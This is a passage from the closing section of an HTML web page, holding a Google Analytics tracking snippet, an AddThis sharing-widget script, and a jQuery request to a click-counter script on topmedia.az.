	    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	    ga('create', 'UA-31581333-12', 'auto');
	    ga('send', 'pageview');

	  </script>
	  <!--Google Analytics-->
	  <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5709013e408ef89c"></script>
	  <script type="text/javascript">jQuery.ajax({type: "GET",url: "http://topmedia.az/click.php"});</script>
  </body>
</html>
